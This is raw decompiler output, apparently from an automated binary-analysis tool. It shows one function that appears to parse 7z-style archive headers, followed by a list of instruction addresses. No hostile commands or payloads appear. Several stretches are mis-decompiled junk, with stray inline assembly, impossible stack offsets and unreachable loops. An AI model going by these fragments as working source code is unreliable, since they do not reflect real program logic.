			E004178D6(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, short _a12, signed int _a16, intOrPtr _a20, char _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, void* _a48, signed int _a52, signed int _a56, signed int _a60, signed int _a64, signed int _a68, signed int _a72, signed int _a76, signed int _a80, intOrPtr _a84, signed int _a88, signed int _a92, signed int _a96, void* _a100, signed int _a108, signed int _a112, unsigned int _a116, signed int _a120, signed int _a124) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v104;
				char _v117;
				void* _v176;
				char _v1308606084;
				void* __ebx;
				signed int __edi;
				signed int* __esi;
				void* __ebp;
				void* _t373;
				signed int _t376;
				signed int _t386;
				signed int _t390;
				signed int _t395;
				signed int _t396;
				signed int _t401;
				intOrPtr* _t404;
				signed int _t405;
				signed int _t406;
				void* _t407;
				void* _t409;
				signed int _t413;
				void* _t417;
				signed int _t420;
				signed int _t434;
				void* _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				intOrPtr* _t457;
				signed int _t458;
				signed int _t461;
				signed int _t463;
				signed int _t475;
				signed int _t482;
				signed int _t494;
				unsigned int _t496;
				void* _t500;
				signed int _t517;
				signed int _t537;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t557;
				signed int _t560;
				signed int _t563;
				signed int _t565;
				signed int _t567;
				intOrPtr* _t569;
				intOrPtr* _t570;
				signed int _t572;
				intOrPtr* _t577;
				signed int _t578;
				void* _t580;
				signed int _t581;

				_t551 = __edx;
				_t578 =  &_v104;
				_t581 = _t580 - 0x90;
				_t572 = __ecx;
				_t373 = E00416087( *((intOrPtr*)(__ecx + 0x38)));
				_t482 = _a108;
				if(_t373 != 2) {
					_t563 = 0;
					__eflags = 0;
				} else {
					_t563 = 0;
					_t587 = __edx;
					if(__edx == 0) {
						E00416899(__ecx, __edx, _t587, _t482 + 0xe0);
						_t373 = E00416087( *(_t572 + 0x38));
					}
				}
				_a72 = _t563;
				_a76 = _t563;
				_a80 = _t563;
				if(_t373 != 3) {
					L9:
					_a36 = _t563;
					_a40 = _t563;
					_a44 = _t563;
					_v44 = _t563;
					_v40 = _t563;
					_v36 = _t563;
					_v32 = _t563;
					_v28 = _t563;
					_v24 = _t563;
					__eflags = _t373 - 4;
					if(_t373 == 4) {
						__eflags = _t551 - _t563;
						if(__eflags == 0) {
							_t569 = _t482 + 0xf8;
							E004175D3(_t482, _t572, _t551, _t572, __eflags,  &_a72, _t569, _t482,  &_a36,  &_v44);
							 *_t569 =  *_t569 +  *((intOrPtr*)(_t482 + 0xf0));
							asm("adc [edi+0x4], eax");
							_t373 = E00416087( *(_t572 + 0x38));
							_t563 = 0;
							__eflags = 0;
						}
					}
					 *(_t482 + 0x5c) = _t563;
					__eflags = _t373 - 5;
					if(__eflags != 0) {
						L85:
						E00416630(_t482, _t482, _t551, __eflags);
						_push(_v32);
						L004191B0();
						_push(_v44);
						L004191B0();
						_push(_a36);
						L004191B0();
						E0041673C( &_a72);
						_t376 = 0;
						__eflags = 0;
						goto L86;
					} else {
						__eflags = _t551 - _t563;
						if(__eflags == 0) {
							_a108 = E004160BB( *(_t572 + 0x38), _t551, _t572, __eflags);
							E00416309(_t482 + 0x58, _t377);
							 *(_t482 + 0x5c) = _a108;
							E004166F2(_t482 + 0x108, _t551, 9, _t563);
							E004166F2(_t482 + 0x108, _t551, 6, _t563);
							__eflags = _a108 - _t563;
							if(__eflags > 0) {
								__eflags = _v40 - _t563;
								if(__eflags != 0) {
									E004166F2(_t482 + 0x108, _t551, 0xa, _t563);
								}
							}
							_t565 = _a108;
							_a60 = 0;
							_a64 = 0;
							_a68 = 0;
							E004167C5( &_a60, _t565, __eflags);
							_a24 = 0;
							_a28 = 0;
							_a32 = 0;
							_a48 = 0;
							_a52 = 0;
							_a56 = 0;
							_a124 = 0;
							while(1) {
								L67:
								_t386 = E00416087( *(_t572 + 0x38));
								_t494 =  *(_t572 + 0x38);
								_a92 = _t386;
								__eflags = _t386 | _t551;
								_a96 = _t551;
								if((_t386 | _t551) == 0) {
									break;
								}
								_a84 = E00416087(_t494);
								_t389 =  *(_t572 + 0x38);
								_t496 =  *((intOrPtr*)( *(_t572 + 0x38) + 4)) -  *((intOrPtr*)( *(_t572 + 0x38) + 8));
								_a88 = _t551;
								_t551 = 0;
								__eflags = _a88;
								if(__eflags > 0) {
									L87:
									_t390 = E00415EBA(_t496, _t565);
									__eflags =  *((intOrPtr*)(_t496 + _t390 * 2)) - _t565;
									if( *((intOrPtr*)(_t496 + _t390 * 2)) != _t565) {
										asm("lock mov eax, [esi+0x64]");
										_v8 = _t390;
										_v4 =  *((intOrPtr*)(_t572 + 0x68));
										_a8 =  *((intOrPtr*)(_t572 + 0x6c));
										asm("adc ecx, ebx");
										_v20 = _t551;
										 *((intOrPtr*)(_t565 + 0xf0)) =  *((intOrPtr*)(_t572 + 0x40)) + 0x20;
										 *(_t565 + 0xf4) = _t496;
										 *((intOrPtr*)(_t565 + 0x128)) = 0x20;
										 *(_t565 + 0x12c) = _t482;
										 *(_t565 + 0x130) = _t482;
										__eflags = _v16 - _t482;
										if(__eflags < 0) {
											L118:
											_t395 = 0;
											__eflags = 0;
											goto L119;
										} else {
											if(__eflags > 0) {
												L106:
												__eflags = _v4 - 0x40000000;
												if(__eflags > 0) {
													goto L118;
												} else {
													if(__eflags < 0) {
														L109:
														_t395 = _v8 | _v4;
														__eflags = _t395;
														if(_t395 != 0) {
															__eflags =  *((intOrPtr*)(_t565 + 0x134)) - _t482;
															if( *((intOrPtr*)(_t565 + 0x134)) == _t482) {
																 *(_t565 + 0x130) = 1;
															}
															asm("adc ecx, ebx");
															 *((intOrPtr*)(_t572 + 0x70)) =  *((intOrPtr*)(_t572 + 0x70)) + _v8 + 0x20;
															asm("adc [esi+0x74], ecx");
															_t401 = _v8 + _t551;
															_t552 = _v4;
															asm("adc edx, [ebp-0x10]");
															_v28 = _t401;
															asm("adc ecx, ebx");
															 *((intOrPtr*)(_t565 + 0x128)) = _t401 + 0x20;
															 *(_t565 + 0x12c) = _t552;
															_t500 =  *((intOrPtr*)(_t572 + 0x48)) -  *((intOrPtr*)(_t565 + 0xf0));
															asm("sbb eax, [edi+0xf4]");
															__eflags =  *((intOrPtr*)(_t572 + 0x4c)) - _t552;
															if(__eflags > 0) {
																L121:
																_t404 =  *_t572;
																_t396 =  *((intOrPtr*)( *_t404 + 0x10))(_t404, _v20, _v16, 1, _t482);
																__eflags = _t396 - _t482;
																if(_t396 == _t482) {
																	_t405 = _v8;
																	__eflags = _t405 - _t405;
																	if(_t405 != _t405) {
																		L124:
																		_t396 = 0x8007000e;
																	} else {
																		__eflags = _t482 - _v4;
																		if(_t482 == _v4) {
																			_push(_v8);
																			L004191BC();
																			_v28 = _t405;
																			_t406 = E00413818(_v8); // executed
																			__eflags = _t406 - _t482;
																			if(_t406 == _t482) {
																				_t554 = _v8;
																				_t504 = _v28;
																				_t407 = E00418D30(_v28, _t554);
																				__eflags = _t407 - _a8;
																				if(_t407 != _a8) {
																					L129:
																					E00415EBA(_t504, _t565);
																				}
																				__eflags =  *((intOrPtr*)(_t565 + 0x134)) - _t482;
																				if( *((intOrPtr*)(_t565 + 0x134)) == _t482) {
																					 *((char*)(_t565 + 0x131)) = 1;
																				}
																				_push(_t482);
																				_v16 = _t482;
																				E004163AA( &_v20, _t572, _v28, _v8);
																				_t504 =  *(_t572 + 0x38);
																				_v12 = _t482;
																				_v8 = _t482;
																				_v4 = _t482;
																				_t409 = E00416087( *(_t572 + 0x38));
																				__eflags = _t409 - 1;
																				if(_t409 != 1) {
																					L134:
																					__eflags = _t409 - 0x17;
																					if(_t409 != 0x17) {
																						goto L129;
																					} else {
																						__eflags = _t554 - _t482;
																						if(__eflags != 0) {
																							goto L129;
																						} else {
																							_push(_a24);
																							_push(_a20);
																							_t504 = _t572;
																							_push(_a16);
																							_t413 = E004176DE(_t572, _t554, __eflags,  *((intOrPtr*)(_t565 + 0xf0)),  *(_t565 + 0xf4), _t565 + 0x100,  &_v12, _a12);
																							_a8 = _t413;
																							__eflags = _t413 - _t482;
																							if(_t413 == _t482) {
																								__eflags = _v8 - _t482;
																								if(_v8 != _t482) {
																									__eflags = _v8 - 1;
																									if(_v8 > 1) {
																										goto L129;
																									} else {
																										E00415EF3( &_v20);
																										E004163D4(_t572,  *_v12);
																										_t504 =  *(_t572 + 0x38);
																										_t417 = E00416087( *(_t572 + 0x38));
																										__eflags = _t417 - 1;
																										if(_t417 != 1) {
																											goto L129;
																										} else {
																											__eflags = _t554 - _t482;
																											if(_t554 != _t482) {
																												goto L129;
																											} else {
																												goto L143;
																											}
																										}
																									}
																								} else {
																									E0041673C( &_v12);
																									E00415EF3( &_v20);
																									goto L127;
																								}
																							} else {
																								E0041673C( &_v12);
																								E00415EF3( &_v20);
																								_t482 = _a8;
																								goto L127;
																							}
																						}
																					}
																				} else {
																					__eflags = _t554 - _t482;
																					if(_t554 == _t482) {
																						L143:
																						 *(_t565 + 0x130) = 1;
																						 *((intOrPtr*)(_t565 + 0x120)) =  *((intOrPtr*)(_t572 + 0x70));
																						 *((intOrPtr*)(_t565 + 0x124)) =  *((intOrPtr*)(_t572 + 0x74));
																						_t420 = E004178D6(_t572, _t554, _t565, _a12, _a16, _a20, _a24);
																						E0041673C( &_v12);
																						E00415EF3( &_v20);
																						_push(_v28);
																						L004191B0();
																						_t396 = _t420;
																					} else {
																						goto L134;
																					}
																				}
																			} else {
																				_t482 = _t406;
																				L127:
																				_push(_v28);
																				L004191B0();
																				_t396 = _t482;
																			}
																		} else {
																			goto L124;
																		}
																	}
																}
															} else {
																if(__eflags < 0) {
																	L117:
																	 *((char*)(_t565 + 0x133)) = 1;
																	goto L118;
																} else {
																	__eflags = _t500 - _v28;
																	if(_t500 >= _v28) {
																		goto L121;
																	} else {
																		goto L117;
																	}
																}
															}
														} else {
															__eflags = _t551 | _v16;
															if((_t551 | _v16) != 0) {
																L119:
																_t396 = _t395 + 1;
																__eflags = _t396;
															} else {
																 *(_t565 + 0x130) = 1;
															}
														}
													} else {
														__eflags = _v8 - _t482;
														if(_v8 > _t482) {
															goto L118;
														} else {
															goto L109;
														}
													}
												}
											} else {
												__eflags = _t551 - _t482;
												if(_t551 < _t482) {
													goto L118;
												} else {
													goto L106;
												}
											}
										}
									} else {
										_t517 = _t496 + 1;
										_t260 = _t572 - 0x1bffbe84;
										 *_t260 =  *(_t572 - 0x1bffbe84) + _t517;
										__eflags =  *_t260;
										if( *_t260 != 0) {
											L96:
											 *(_t565 + 0xec) = _t390;
											_t517 =  *((intOrPtr*)(_t572 + 0x56));
											goto L97;
										} else {
											_t262 =  &_v1308606084;
											 *_t262 = _v1308606084 + _t517;
											__eflags =  *_t262;
											if( *_t262 < 0) {
												L97:
												_t572 = _t572 - 1;
												__eflags = _t572;
												_push(_t572);
												 *(_t565 + 0xe0) = _t517;
												goto L98;
											} else {
												_t264 = _t565 - 0x3fffbe84;
												 *_t264 =  *(_t565 - 0x3fffbe84) + _t551;
												__eflags =  *_t264;
												if( *_t264 != 0) {
													L98:
													_t517 =  *((intOrPtr*)(_t572 + 0x57));
													_t482 = 0;
													__eflags = 0;
													goto L99;
												} else {
													_t556 = _t551 + _t551;
													__eflags = _t556;
													if(_t556 < 0) {
														L99:
														asm("fisttp dword [eax+0xe18f]");
														goto L100;
													} else {
														_t557 = _t556 + _t556;
														__eflags = _t557;
														if(_t557 < 0) {
															L100:
															 *_t390 =  *_t390 + _t390;
															 *_t390 =  *_t390 + _t482;
															asm("lahf");
															asm("loopne 0x2");
															 *_t390 =  *_t390 + _t390;
															__eflags =  *_t390;
														} else {
															_t266 = _t482 - 0x40ffbe84;
															 *_t266 =  *(_t482 - 0x40ffbe84) + _t557;
															__eflags =  *_t266;
															if( *_t266 >= 0) {
																_t268 =  &_v117;
																 *_t268 = _v117 + _t557;
																__eflags =  *_t268;
																_push(_t578);
																_t578 = _t581;
																_t581 = _t581 - 0x1c;
																_push(_t482);
																_push(_t572);
																_push(_t565);
																_t565 =  *(_t578 + 8);
																_t572 = _t517;
																E0041563D(_t565);
																 *((intOrPtr*)(_t565 + 0xe8)) =  *((intOrPtr*)(_t572 + 0x40));
																_t390 =  *(_t572 + 0x44);
																goto L96;
															}
														}
													}
												}
											}
										}
										 *_t565 =  *_t565 + _t517;
										__eflags = _t578;
										 *_t390 =  *_t390 + _t390;
										_t278 = _t482 + 0x4e8b6046;
										 *_t278 =  *(_t482 + 0x4e8b6046) + _t517;
										__eflags =  *_t278;
									}
									return _t396;
								} else {
									if(__eflags < 0) {
										L21:
										_push(1);
										_a4 = _t551;
										E004163AA(_t578, _t572,  *((intOrPtr*)(_t389 + 8)) +  *_t389, _a84);
										_t565 = 0;
										__eflags = _a96;
										if(__eflags > 0) {
											L64:
											 *((char*)(_t482 + 0x135)) = 1;
											 *((intOrPtr*)( *(_t572 + 0x38) + 8)) =  *((intOrPtr*)( *(_t572 + 0x38) + 4));
											goto L65;
										} else {
											if(__eflags < 0) {
												L24:
												_t434 = _a92 + 0xfffffff2;
												__eflags = _t434 - 0xb;
												if(__eflags > 0) {
													goto L64;
												} else {
													switch( *((intOrPtr*)(_t434 * 4 +  &M00417E72))) {
														case 0:
															__eax =  &_a60;
															__ecx = __esi;
															__eax = E004168E5(__esi, __edx, _a108,  &_a60);
															__eax = 0;
															_a124 = __edi;
															__eflags = _a64 - __edi;
															if(__eflags > 0) {
																do {
																	__ecx = _a60;
																	__eflags =  *((char*)(__ecx + __eax));
																	if( *((char*)(__ecx + __eax)) != 0) {
																		_t156 =  &_a124;
																		 *_t156 = _a124 + 1;
																		__eflags =  *_t156;
																	}
																	__eax = __eax + 1;
																	__eflags = __eax - _a64;
																} while (__eflags < 0);
															}
															__edi = _a124;
															 &_a24 = E004167C5( &_a24, __edi, __eflags);
															 &_a48 = E004167C5( &_a48, __edi, __eflags);
															goto L35;
														case 1:
															__eax =  &_a24;
															goto L48;
														case 2:
															__eax =  &_a48;
															L48:
															__ecx = __esi;
															__eax = E004168E5(__ecx, __edx, _a124, __eax);
															goto L35;
														case 3:
															_v16 = _t565;
															E004167E7( &_v20, _t551, _t578, __eflags, _t572,  &_a72);
															_t565 =  *((intOrPtr*)( *(_t572 + 0x38) + 4)) -  *((intOrPtr*)( *(_t572 + 0x38) + 8));
															E0040BCC0(_t482 + 0xd0, _t565);
															E00415F69( *(_t572 + 0x38),  *((intOrPtr*)(_t482 + 0xd0)), _t565);
															E004161F4(_t482 + 0xd8, __eflags,  *(_t482 + 0x5c) + 1);
															_t551 = 0;
															_t443 = 0;
															_a116 = 0;
															_a112 = 0;
															__eflags =  *(_t482 + 0x5c);
															if( *(_t482 + 0x5c) <= 0) {
																L32:
																_t551 = _t551 >> 1;
																 *( *((intOrPtr*)(_t482 + 0xd8)) + _t443 * 4) = _t551;
																__eflags = _a116 - _t565;
																if(_a116 != _t565) {
																	 *((char*)(_t572 + 0x3c)) = 1;
																}
																E00415EF3( &_v20);
																goto L35;
															} else {
																do {
																	_a120 = _a120 & 0x00000000;
																	_t447 =  *((intOrPtr*)(_t482 + 0xd0)) + _t551;
																	_t496 = _t565 - _t551 >> 1;
																	__eflags = _t496;
																	if(_t496 != 0) {
																		while(1) {
																			_t551 = _a120;
																			__eflags =  *((short*)(_t447 + _t551 * 2));
																			if( *((short*)(_t447 + _t551 * 2)) == 0) {
																				goto L30;
																			}
																			_a120 = _a120 + 1;
																			__eflags = _a120 - _t496;
																			if(_a120 < _t496) {
																				continue;
																			}
																			goto L30;
																		}
																	}
																	L30:
																	__eflags = _a120 - _t496;
																	if(_a120 == _t496) {
																		goto L87;
																	} else {
																		goto L31;
																	}
																	goto L144;
																	L31:
																	_t448 = _a112;
																	 *( *((intOrPtr*)(_t482 + 0xd8)) + _t448 * 4) = _a116 >> 1;
																	_t443 = _t448 + 1;
																	_t551 = _a116 + 2 + _a120 * 2;
																	_a116 = _t551;
																	_a112 = _t443;
																	__eflags = _t443 -  *(_t482 + 0x5c);
																} while (_t443 <  *(_t482 + 0x5c));
																goto L32;
															}
															goto L144;
														case 4:
															__eax = __ebx + 0x64;
															goto L51;
														case 5:
															__eax = __ebx + 0x7c;
															goto L51;
														case 6:
															__eax = __ebx + 0x94;
															goto L51;
														case 7:
															__eax =  &_v12;
															__ecx = __esi;
															_v12 = __edi;
															_v8 = __edi;
															_v4 = __edi;
															E00416933(__esi, __edx, __edi, __ebp, __eflags,  *((intOrPtr*)(__ebx + 0x5c)),  &_v12) =  &_a72;
															__ecx =  &_a8;
															_a12 = __di;
															__eax = E004167E7( &_a8, __edx, __ebp, __eflags, __esi,  &_a72);
															_a120 = __edi;
															__eflags = _a108 - __edi;
															if(_a108 > __edi) {
																_a116 = __edi;
																do {
																	__edi =  *(__ebx + 0x58);
																	__eax = _v12;
																	__ecx = _a120;
																	__edi =  *(__ebx + 0x58) + _a116;
																	__al =  *((intOrPtr*)(_v12 + _a120));
																	 *((char*)(__edi + 0x13)) = __al;
																	__eflags = __al;
																	if(__al != 0) {
																		__ecx =  *((intOrPtr*)(__esi + 0x38));
																		 *((intOrPtr*)(__edi + 8)) = E004160D1( *((intOrPtr*)(__esi + 0x38)));
																	}
																	_a120 = _a120 + 1;
																	__eax = _a120;
																	_a116 = _a116 + 0x18;
																	__eflags = _a120 - _a108;
																} while (_a120 < _a108);
															}
															__ecx =  &_a8;
															__eax = E00415EF3( &_a8);
															_push(_v12);
															L004191B0();
															_pop(__ecx);
															goto L35;
														case 8:
															goto L64;
														case 9:
															__eax = __ebx + 0xac;
															L51:
															__ecx = __esi;
															 &_a72 = E0041697E(__ecx, __edx, __eflags,  &_a72,  &_a72, _a108);
															L35:
															E004166F2(_t482 + 0x108, _t551, _a92, _a96);
															goto L65;
														case 0xa:
															_a16 = __edi;
															__eflags = _a88 - __edi;
															if(__eflags >= 0) {
																if(__eflags > 0) {
																	L58:
																	__ecx =  *((intOrPtr*)(__esi + 0x38));
																	__eax = E00415F52(__ecx, __edi);
																	__eflags = __al;
																	if(__al != 0) {
																		 *((char*)(__esi + 0x3c)) = 1;
																	}
																	_a16 = _a16 + 1;
																	asm("adc edi, 0x0");
																	__eflags = __edi - _a88;
																} else {
																	__eflags = _a84 - __edi;
																	if(_a84 > __edi) {
																		goto L58;
																		do {
																			do {
																				goto L58;
																			} while (__eflags < 0);
																			if(__eflags <= 0) {
																				goto L62;
																			}
																			goto L65;
																			L62:
																			__eax = _a84;
																			__eflags = _a16 - _a84;
																		} while (_a16 < _a84);
																	}
																}
															}
															L65:
															_t496 =  *((intOrPtr*)( *(_t572 + 0x38) + 4)) -  *((intOrPtr*)( *(_t572 + 0x38) + 8));
															__eflags = _t496;
															if(_t496 != 0) {
																goto L87;
															} else {
																E00415EF3(_t578);
																goto L67;
															}
															goto L144;
													}
												}
											} else {
												__eflags = _a92 - 0x40000000;
												if(_a92 > 0x40000000) {
													goto L64;
												} else {
													goto L24;
												}
											}
										}
									} else {
										__eflags = _a84 - _t496;
										if(_a84 > _t496) {
											goto L87;
										} else {
											goto L21;
										}
									}
								}
								goto L144;
							}
							E00416087(_t494);
							__eflags = _a108 - _a124 - _a40;
							if(_a108 - _a124 != _a40) {
								E00415EDA(_t494);
							}
							_t537 = _a48;
							_t567 = 0;
							_t452 = 0;
							_a116 = 0;
							__eflags = _a124;
							if(_a124 > 0) {
								do {
									__eflags =  *((char*)(_t537 + _t452));
									if( *((char*)(_t537 + _t452)) != 0) {
										_t199 =  &_a116;
										 *_t199 = _a116 + 1;
										__eflags =  *_t199;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _a124;
								} while (_t452 < _a124);
							}
							_a120 = _t567;
							__eflags = _a108 - _t567;
							if(__eflags > 0) {
								_t454 = _a24 - _t537;
								__eflags = _t454;
								_a112 = _t537;
								_a124 = _t567;
								_a88 = _t454;
								do {
									_t577 =  *((intOrPtr*)(_t482 + 0x58)) + _a124;
									_t455 = _a60;
									__eflags =  *((char*)(_t455 + _a120));
									_t456 = _t455 & 0xffffff00 |  *((char*)(_t455 + _a120)) == 0x00000000;
									 *(_t577 + 0x10) = _t456;
									 *((intOrPtr*)(_t577 + 0xc)) = 0;
									__eflags = _t456;
									if(_t456 == 0) {
										_t457 = _a112;
										_t560 = _a88;
										__eflags =  *(_t560 + _t457);
										 *((char*)(_t577 + 0x11)) = _t560 & 0xffffff00 |  *(_t560 + _t457) == 0x00000000;
										_t551 =  *_t457;
										_t458 = _t457 + 1;
										__eflags = _t458;
										_a96 =  *_t457;
										_a112 = _t458;
										 *_t577 = 0;
										 *((intOrPtr*)(_t577 + 4)) = 0;
										 *((char*)(_t577 + 0x12)) = 0;
									} else {
										_t461 = _a36;
										 *((char*)(_t577 + 0x11)) = 0;
										_a96 = 0;
										 *_t577 =  *((intOrPtr*)(_t461 + _t567 * 8));
										 *((intOrPtr*)(_t577 + 4)) =  *((intOrPtr*)(_t461 + 4 + _t567 * 8));
										_t463 = E0041638F( &_v44, _t567);
										 *((char*)(_t577 + 0x12)) = _t463;
										__eflags = _t463;
										if(_t463 != 0) {
											 *((intOrPtr*)(_t577 + 0xc)) =  *((intOrPtr*)(_v32 + _t567 * 4));
										}
										_t567 = _t567 + 1;
									}
									__eflags = _a116;
									if(_a116 != 0) {
										E0041671B(_t482 + 0xc4, _a96);
									}
									_a120 = _a120 + 1;
									_a124 = _a124 + 0x18;
									__eflags = _a120 - _a108;
								} while (__eflags < 0);
							}
							_push(_a48);
							L004191B0();
							_push(_a24);
							L004191B0();
							_push(_a60);
							L004191B0();
							_t581 = _t581 + 0xc;
						}
						goto L85;
					}
				} else {
					_t589 = _t551 - _t563;
					if(_t551 != _t563) {
						goto L9;
					} else {
						_push(_a124);
						_push(_a120);
						_t570 = _t482 + 0x100;
						_push(_a116);
						_t475 = E004176DE(_t572, _t551, _t589,  *((intOrPtr*)(_t482 + 0xf0)),  *((intOrPtr*)(_t482 + 0xf4)), _t570,  &_a72, _a112);
						_a108 = _t475;
						if(_t475 == 0) {
							 *_t570 =  *_t570 +  *((intOrPtr*)(_t482 + 0xf0));
							asm("adc [edi+0x4], eax");
							_t373 = E00416087( *(_t572 + 0x38));
							_t563 = 0;
							__eflags = 0;
							goto L9;
						} else {
							E0041673C( &_a72);
							_t376 = _a108;
							L86:
							return _t376;
						}
					}
				}
				L144:
			}

0x004178d6
0x004178d7
0x004178db
0x004178e3
0x004178e9
0x004178ee
0x004178f4
0x00417914
0x00417914
0x004178f6
0x004178f6
0x004178f8
0x004178fa
0x00417905
0x0041790d
0x0041790d
0x004178fa
0x00417916
0x00417919
0x0041791c
0x00417922
0x00417984
0x00417984
0x00417987
0x0041798a
0x0041798d
0x00417990
0x00417993
0x00417996
0x00417999
0x0041799c
0x0041799f
0x004179a2
0x004179a4
0x004179a6
0x004179b1
0x004179be
0x004179c9
0x004179d1
0x004179d7
0x004179dc
0x004179dc
0x004179dc
0x004179a6
0x004179de
0x004179e1
0x004179e4
0x00417e35
0x00417e37
0x00417e3c
0x00417e3f
0x00417e44
0x00417e47
0x00417e4c
0x00417e4f
0x00417e5a
0x00417e5f
0x00417e5f
0x00000000
0x004179ea
0x004179ea
0x004179ec
0x004179fe
0x00417a01
0x00417a12
0x00417a15
0x00417a23
0x00417a28
0x00417a2b
0x00417a2d
0x00417a30
0x00417a3b
0x00417a3b
0x00417a30
0x00417a40
0x00417a45
0x00417a48
0x00417a4b
0x00417a51
0x00417a58
0x00417a5b
0x00417a5e
0x00417a61
0x00417a64
0x00417a67
0x00417a6a
0x00417d1d
0x00417d1d
0x00417d20
0x00417d25
0x00417d28
0x00417d2b
0x00417d2d
0x00417d30
0x00000000
0x00000000
0x00417a77
0x00417a7a
0x00417a80
0x00417a83
0x00417a86
0x00417a88
0x00417a8b
0x00417e6b
0x00417e6b
0x00417e72
0x00417e76
0x00417ef4
0x00417ef8
0x00417efe
0x00417f04
0x00417f0d
0x00417f0f
0x00417f12
0x00417f18
0x00417f1e
0x00417f28
0x00417f2e
0x00417f34
0x00417f37
0x00417fd6
0x00417fd6
0x00417fd6
0x00000000
0x00417f3d
0x00417f3d
0x00417f47
0x00417f47
0x00417f4e
0x00000000
0x00417f54
0x00417f54
0x00417f5b
0x00417f5e
0x00417f5e
0x00417f61
0x00417f71
0x00417f77
0x00417f79
0x00417f79
0x00417f89
0x00417f8b
0x00417f91
0x00417f94
0x00417f96
0x00417f99
0x00417f9c
0x00417fa4
0x00417fa6
0x00417fac
0x00417fb5
0x00417fbe
0x00417fc4
0x00417fc6
0x00417fe0
0x00417fe0
0x00417fee
0x00417ff1
0x00417ff3
0x00417ff5
0x00417ff8
0x00417ffa
0x00418001
0x00418001
0x00417ffc
0x00417ffc
0x00417fff
0x00418008
0x0041800b
0x00418018
0x0041801b
0x00418020
0x00418022
0x00418033
0x00418036
0x00418039
0x0041803e
0x00418041
0x00418043
0x00418043
0x00418043
0x00418048
0x0041804e
0x00418050
0x00418050
0x00418057
0x00418061
0x00418066
0x0041806b
0x0041806e
0x00418071
0x00418074
0x00418077
0x0041807c
0x0041807f
0x00418089
0x00418089
0x0041808c
0x00000000
0x0041808e
0x0041808e
0x00418090
0x00000000
0x00418092
0x00418092
0x00418098
0x0041809b
0x0041809d
0x004180b7
0x004180bc
0x004180bf
0x004180c1
0x004180db
0x004180de
0x004180f5
0x004180f9
0x00000000
0x004180ff
0x00418102
0x00418110
0x00418115
0x00418118
0x0041811d
0x00418120
0x00000000
0x00418126
0x00418126
0x00418128
0x00000000
0x00000000
0x00000000
0x00000000
0x00418128
0x00418120
0x004180e0
0x004180e3
0x004180eb
0x00000000
0x004180eb
0x004180c3
0x004180c6
0x004180ce
0x004180d3
0x00000000
0x004180d3
0x004180c1
0x00418090
0x00418081
0x00418081
0x00418083
0x0041812e
0x00418131
0x00418141
0x00418150
0x00418156
0x00418160
0x00418168
0x0041816d
0x00418170
0x00418176
0x00000000
0x00000000
0x00000000
0x00418083
0x00418024
0x00418024
0x00418026
0x00418026
0x00418029
0x0041802f
0x0041802f
0x00000000
0x00000000
0x00000000
0x00417fff
0x00417ffa
0x00417fc8
0x00417fc8
0x00417fcf
0x00417fcf
0x00000000
0x00417fca
0x00417fca
0x00417fcd
0x00000000
0x00000000
0x00000000
0x00000000
0x00417fcd
0x00417fc8
0x00417f63
0x00417f63
0x00417f66
0x00417fd8
0x00417fd8
0x00417fd8
0x00417f68
0x00417f68
0x00417f68
0x00417f66
0x00417f56
0x00417f56
0x00417f59
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f59
0x00417f54
0x00417f3f
0x00417f3f
0x00417f41
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f41
0x00417f3d
0x00417e78
0x00417e78
0x00417e79
0x00417e79
0x00417e79
0x00417e7f
0x00417ec2
0x00417ec3
0x00417ec9
0x00000000
0x00417e81
0x00417e81
0x00417e81
0x00417e81
0x00417e87
0x00417eca
0x00417eca
0x00417eca
0x00417ecb
0x00417ecc
0x00000000
0x00417e89
0x00417e89
0x00417e89
0x00417e89
0x00417e8f
0x00417ed2
0x00417ed2
0x00417ed5
0x00417ed5
0x00000000
0x00417e91
0x00417e91
0x00417e91
0x00417e93
0x00417ed6
0x00417ed6
0x00000000
0x00417e95
0x00417e95
0x00417e95
0x00417e97
0x00417eda
0x00417eda
0x00417edc
0x00417ede
0x00417edf
0x00417ee1
0x00417ee1
0x00417e99
0x00417e99
0x00417e99
0x00417e99
0x00417e9f
0x00417ea1
0x00417ea1
0x00417ea1
0x00417ea2
0x00417ea3
0x00417ea5
0x00417ea8
0x00417ea9
0x00417eaa
0x00417eab
0x00417eae
0x00417eb2
0x00417eba
0x00417ec0
0x00000000
0x00417ec0
0x00417e9f
0x00417e97
0x00417e93
0x00417e8f
0x00417e87
0x00417ee2
0x00417ee4
0x00417ee6
0x00417ee8
0x00417ee8
0x00417ee8
0x00417ee8
0x00417fdd
0x00417a91
0x00417a91
0x00417a9c
0x00417aa1
0x00417aa6
0x00417aaf
0x00417ab4
0x00417ab6
0x00417ab9
0x00417cf6
0x00417cf6
0x00417d03
0x00000000
0x00417abf
0x00417abf
0x00417ace
0x00417ad1
0x00417ad4
0x00417ad7
0x00000000
0x00417add
0x00417add
0x00000000
0x00417c39
0x00417c40
0x00417c42
0x00417c47
0x00417c49
0x00417c4c
0x00417c4f
0x00417c51
0x00417c51
0x00417c54
0x00417c58
0x00417c5a
0x00417c5a
0x00417c5a
0x00417c5a
0x00417c5d
0x00417c5e
0x00417c5e
0x00417c51
0x00417c63
0x00417c69
0x00417c71
0x00000000
0x00000000
0x00417c7b
0x00000000
0x00000000
0x00417c8e
0x00417c7e
0x00417c82
0x00417c84
0x00000000
0x00000000
0x00417aec
0x00417af0
0x00417afb
0x00417b05
0x00417b14
0x00417b24
0x00417b29
0x00417b2b
0x00417b2d
0x00417b30
0x00417b33
0x00417b36
0x00417b8e
0x00417b94
0x00417b96
0x00417b99
0x00417b9c
0x00417b9e
0x00417b9e
0x00417ba5
0x00000000
0x00417b38
0x00417b38
0x00417b3e
0x00417b46
0x00417b48
0x00417b48
0x00417b4a
0x00417b4c
0x00417b4c
0x00417b4f
0x00417b54
0x00000000
0x00000000
0x00417b56
0x00417b59
0x00417b5c
0x00000000
0x00000000
0x00000000
0x00417b5c
0x00417b4c
0x00417b5e
0x00417b5e
0x00417b61
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417b67
0x00417b6a
0x00417b75
0x00417b7e
0x00417b7f
0x00417b83
0x00417b86
0x00417b89
0x00417b89
